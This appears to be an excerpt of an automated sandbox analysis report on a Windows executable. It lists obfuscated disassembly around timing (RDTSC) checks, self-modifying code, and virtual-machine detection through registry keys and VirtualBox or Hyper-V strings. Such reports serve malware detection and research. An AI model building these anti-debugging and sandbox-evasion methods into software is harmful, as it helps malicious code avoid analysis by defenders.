Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C1750 second address: 76C1785 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD203FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F8C8B89E3AAh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F8C1CD20408h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C1785 second address: 76C1794 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD6323Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76C1794 second address: 76C1857 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD20409h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or dword ptr [edx+38h], FFFFFFFFh 0x0000000d pushad 0x0000000e mov cl, 8Bh 0x00000010 popad 0x00000011 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000015 pushad 0x00000016 mov ch, 18h 0x00000018 pushfd 0x00000019 jmp 00007F8C1CD203FDh 0x0000001e add eax, 3C5AE996h 0x00000024 jmp 00007F8C1CD20401h 0x00000029 popfd 0x0000002a popad 0x0000002b or dword ptr [edx+40h], FFFFFFFFh 0x0000002f pushad 0x00000030 push eax 0x00000031 pushfd 0x00000032 jmp 00007F8C1CD20403h 0x00000037 sbb eax, 253462CEh 0x0000003d jmp 00007F8C1CD20409h 0x00000042 popfd 0x00000043 pop eax 0x00000044 mov esi, edi 0x00000046 popad 0x00000047 pop esi 0x00000048 jmp 00007F8C1CD20403h 0x0000004d pop ebx 0x0000004e jmp 00007F8C1CD20406h 0x00000053 leave 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 movzx esi, di 0x0000005a rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 7710E11 second address: 7710E4F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F8C1CD6323Eh 0x0000000c sub ecx, 07CA3FB8h 0x00000012 jmp 00007F8C1CD6323Bh 0x00000017 popfd 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov dx, cx 0x00000020 jmp 00007F8C1CD6323Eh 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 7710E4F second address: 7710EFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD203FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007F8C1CD203FBh 0x00000010 pushfd 0x00000011 jmp 00007F8C1CD20408h 0x00000016 add cl, FFFFFFA8h 0x00000019 jmp 00007F8C1CD203FBh 0x0000001e popfd 0x0000001f pop ecx 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F8C1CD20405h 0x0000002a or ecx, 1F12E7C6h 0x00000030 jmp 00007F8C1CD20401h 0x00000035 popfd 0x00000036 mov ebx, esi 0x00000038 popad 0x00000039 pop ebp 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007F8C1CD203FFh 0x00000043 sub ax, CEFEh 0x00000048 jmp 00007F8C1CD20409h 0x0000004d popfd 0x0000004e mov ch, 3Fh 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76B06FF second address: 76B0705 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76B0705 second address: 76B0709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76B0709 second address: 76B070D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76B070D second address: 76B075F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F8C1CD203FCh 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 mov esi, 34A7E9DDh 0x00000017 pushfd 0x00000018 jmp 00007F8C1CD203FAh 0x0000001d and al, 00000038h 0x00000020 jmp 00007F8C1CD203FBh 0x00000025 popfd 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F8C1CD20405h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76506DC second address: 765078D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8C1CD6323Fh 0x00000009 and si, C8FEh 0x0000000e jmp 00007F8C1CD63249h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F8C1CD63240h 0x0000001a adc cx, 17F8h 0x0000001f jmp 00007F8C1CD6323Bh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 push eax 0x00000029 jmp 00007F8C1CD63249h 0x0000002e xchg eax, ebp 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007F8C1CD6323Ch 0x00000036 jmp 00007F8C1CD63245h 0x0000003b popfd 0x0000003c mov ebx, eax 0x0000003e popad 0x0000003f mov ebp, esp 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 jmp 00007F8C1CD63242h 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 765078D second address: 76507B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD203FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d call 00007F8C1CD20402h 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 7650B45 second address: 7650BA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD63246h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c mov ax, 2AF9h 0x00000010 jmp 00007F8C1CD63246h 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 push edx 0x00000019 mov bx, cx 0x0000001c pop ecx 0x0000001d mov dx, 4A4Ch 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 jmp 00007F8C1CD6323Bh 0x00000028 mov ebp, esp 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov si, bx 0x00000030 mov edi, 708A0FB2h 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 7650BA3 second address: 7650BCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F8C1CD20406h 0x00000008 pop esi 0x00000009 mov ax, bx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebp 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 mov si, di 0x00000016 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76A0A04 second address: 76A0A0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76A0A0A second address: 76A0A21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD203FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76A0A21 second address: 76A0A7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F8C1CD6323Ah 0x0000000a add ch, FFFFFFC8h 0x0000000d jmp 00007F8C1CD6323Bh 0x00000012 popfd 0x00000013 popad 0x00000014 pushfd 0x00000015 jmp 00007F8C1CD63248h 0x0000001a adc ch, 00000028h 0x0000001d jmp 00007F8C1CD6323Bh 0x00000022 popfd 0x00000023 popad 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push esi 0x00000029 pop edi 0x0000002a call 00007F8C1CD6323Eh 0x0000002f pop esi 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 768004F second address: 76800AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD20404h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF0h 0x0000000c pushad 0x0000000d mov dx, ax 0x00000010 popad 0x00000011 sub esp, 44h 0x00000014 pushad 0x00000015 mov edi, eax 0x00000017 pushfd 0x00000018 jmp 00007F8C1CD203FEh 0x0000001d sub ax, 2A48h 0x00000022 jmp 00007F8C1CD203FBh 0x00000027 popfd 0x00000028 popad 0x00000029 xchg eax, ebx 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d call 00007F8C1CD20402h 0x00000032 pop esi 0x00000033 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76800AD second address: 7680107 instructions: 0x00000000 rdtsc 0x00000002 mov dx, B766h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F8C1CD63247h 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 mov eax, edx 0x00000012 mov si, bx 0x00000015 popad 0x00000016 xchg eax, ebx 0x00000017 pushad 0x00000018 jmp 00007F8C1CD63243h 0x0000001d mov ah, F8h 0x0000001f popad 0x00000020 push ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F8C1CD63247h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 7680107 second address: 768010D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 768010D second address: 768014B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD6323Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], esi 0x0000000e jmp 00007F8C1CD63246h 0x00000013 xchg eax, edi 0x00000014 pushad 0x00000015 jmp 00007F8C1CD6323Eh 0x0000001a push eax 0x0000001b push edx 0x0000001c push ecx 0x0000001d pop edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 768014B second address: 7680182 instructions: 0x00000000 rdtsc 0x00000002 mov ax, E9B3h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F8C1CD20402h 0x00000011 sub cx, A3B8h 0x00000016 jmp 00007F8C1CD203FBh 0x0000001b popfd 0x0000001c popad 0x0000001d xchg eax, edi 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 7680182 second address: 7680188 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 7680188 second address: 768020D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edx 0x00000005 mov eax, 1D65CDFBh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov edi, dword ptr [ebp+08h] 0x00000010 jmp 00007F8C1CD203FEh 0x00000015 mov dword ptr [esp+24h], 00000000h 0x0000001d jmp 00007F8C1CD20400h 0x00000022 lock bts dword ptr [edi], 00000000h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F8C1CD203FDh 0x00000030 sub al, 00000066h 0x00000033 jmp 00007F8C1CD20401h 0x00000038 popfd 0x00000039 pushfd 0x0000003a jmp 00007F8C1CD20400h 0x0000003f adc eax, 09E8B208h 0x00000045 jmp 00007F8C1CD203FBh 0x0000004a popfd 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 768020D second address: 7680273 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8C1CD6323Fh 0x00000009 add esi, 43A1BA4Eh 0x0000000f jmp 00007F8C1CD63249h 0x00000014 popfd 0x00000015 jmp 00007F8C1CD63240h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d jc 00007F8C8CA35416h 0x00000023 jmp 00007F8C1CD63240h 0x00000028 pop edi 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov cx, di 0x0000002f mov ah, bl 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76B0795 second address: 76B07D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c call 00007F8C1CD20401h 0x00000011 pop esi 0x00000012 pop edx 0x00000013 mov cx, 4D5Dh 0x00000017 popad 0x00000018 push eax 0x00000019 jmp 00007F8C1CD20403h 0x0000001e xchg eax, ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push edx 0x00000023 pop esi 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76B07D5 second address: 76B07DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76B07DA second address: 76B07E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76B07E0 second address: 76B0803 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8C1CD63247h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76A092C second address: 76A0930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76A0930 second address: 76A0943 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD6323Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76A0943 second address: 76A0949 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76A0949 second address: 76A094D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76A094D second address: 76A0969 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD203FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop eax 0x00000013 push edi 0x00000014 pop eax 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 76A0969 second address: 76A09B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD63248h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F8C1CD63240h 0x00000010 pop ebp 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushfd 0x00000015 jmp 00007F8C1CD6323Ch 0x0000001a adc ch, FFFFFFA8h 0x0000001d jmp 00007F8C1CD6323Bh 0x00000022 popfd 0x00000023 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 7720944 second address: 77209E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD20401h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F8C1CD203FEh 0x0000000f push eax 0x00000010 pushad 0x00000011 call 00007F8C1CD20401h 0x00000016 jmp 00007F8C1CD20400h 0x0000001b pop ecx 0x0000001c movsx ebx, ax 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 pushad 0x00000022 push eax 0x00000023 mov dl, 6Bh 0x00000025 pop ecx 0x00000026 movsx ebx, ax 0x00000029 popad 0x0000002a mov ebp, esp 0x0000002c jmp 00007F8C1CD20408h 0x00000031 mov dl, byte ptr [ebp+14h] 0x00000034 jmp 00007F8C1CD20400h 0x00000039 mov eax, dword ptr [ebp+10h] 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F8C1CD20407h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 77209E3 second address: 77209E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 77209E8 second address: 7720A59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F8C1CD20405h 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d and dl, 00000007h 0x00000010 pushad 0x00000011 jmp 00007F8C1CD203FDh 0x00000016 mov bl, cl 0x00000018 popad 0x00000019 test eax, eax 0x0000001b pushad 0x0000001c mov dx, C71Ch 0x00000020 call 00007F8C1CD20405h 0x00000025 mov dx, ax 0x00000028 pop eax 0x00000029 popad 0x0000002a je 00007F8C8C975BAEh 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F8C1CD20405h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 7720A59 second address: 7720A6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD63241h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 7720A6E second address: 7720AEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F8C1CD20407h 0x00000008 pop ecx 0x00000009 mov ebx, 130D8C3Ch 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov ecx, 00000000h 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F8C1CD203FEh 0x0000001d adc si, F358h 0x00000022 jmp 00007F8C1CD203FBh 0x00000027 popfd 0x00000028 popad 0x00000029 inc ecx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F8C1CD20400h 0x00000031 add si, FDB8h 0x00000036 jmp 00007F8C1CD203FBh 0x0000003b popfd 0x0000003c popad 0x0000003d shr eax, 1 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 push ecx 0x00000043 pop edx 0x00000044 mov eax, 03F6C539h 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 7720AEA second address: 7720B00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C1CD63242h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 7720B00 second address: 7720944 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD203FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F8C8C975AB6h 0x00000010 jne 00007F8C1CD203EDh 0x00000012 inc ecx 0x00000013 shr eax, 1 0x00000015 jne 00007F8C1CD203EDh 0x00000017 imul ecx, ecx, 03h 0x0000001a movzx eax, dl 0x0000001d cdq 0x0000001e sub ecx, 03h 0x00000021 call 00007F8C1CD308EDh 0x00000026 cmp cl, 00000040h 0x00000029 jnc 00007F8C1CD20407h 0x0000002b cmp cl, 00000020h 0x0000002e jnc 00007F8C1CD203F8h 0x00000030 shld edx, eax, cl 0x00000033 shl eax, cl 0x00000035 ret 0x00000036 or edx, dword ptr [ebp+0Ch] 0x00000039 or eax, dword ptr [ebp+08h] 0x0000003c or edx, 80000000h 0x00000042 pop ebp 0x00000043 retn 0010h 0x00000046 push ebp 0x00000047 push 00000001h 0x00000049 push edx 0x0000004a push eax 0x0000004b call edi 0x0000004d mov edi, edi 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 call 00007F8C1CD203FDh 0x00000057 pop esi 0x00000058 pushfd 0x00000059 jmp 00007F8C1CD20401h 0x0000005e sub ax, 1926h 0x00000063 jmp 00007F8C1CD20401h 0x00000068 popfd 0x00000069 popad 0x0000006a rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 7700DD9 second address: 7700DDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 7700DDD second address: 7700DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 7700DE3 second address: 7700E20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD6323Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d mov si, 300Dh 0x00000011 mov esi, 2F96C009h 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a movzx esi, bx 0x0000001d pushad 0x0000001e push edi 0x0000001f pop esi 0x00000020 popad 0x00000021 popad 0x00000022 pop ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F8C1CD63241h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 7710578 second address: 7710594 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD20401h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 7710594 second address: 7710598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 7710598 second address: 77105AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD203FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 77105AB second address: 77105C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8C1CD6323Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 77105C2 second address: 77105DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD203FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edi 0x0000000e pop ecx 0x0000000f mov edx, 064B0F32h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 77105DD second address: 77105E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Special instruction interceptor: First address: 1071B19 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Special instruction interceptor: First address: 1071C1A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Special instruction interceptor: First address: 1214673 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Special instruction interceptor: First address: 106F1AE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Special instruction interceptor: First address: 1222920 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Special instruction interceptor: First address: 129AA5A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Special instruction interceptor: First address: 1212E51 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_00B79980 rdtsc 1_2_00B79980
Contains functionality to detect virtual machines (STR)
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_3_01CC4C39 str word ptr [eax+esi*2+00006469h] 1_3_01CC4C39
Source: C:\Users\user\Desktop\mBr65h6L4w.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_0099255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses, 1_2_0099255D
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_009929FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle, 1_2_009929FF
Source: C:\Users\user\Desktop\mBr65h6L4w.exe Code function: 1_2_0099255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses, 1_2_0099255D
Source: mBr65h6L4w.exe, mBr65h6L4w.exe, 00000001.00000002.2393145911.00000000011F0000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: mBr65h6L4w.exe, 00000001.00000002.2391817963.0000000000F01000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: mBr65h6L4w.exe Binary or memory string: Hyper-V RAW
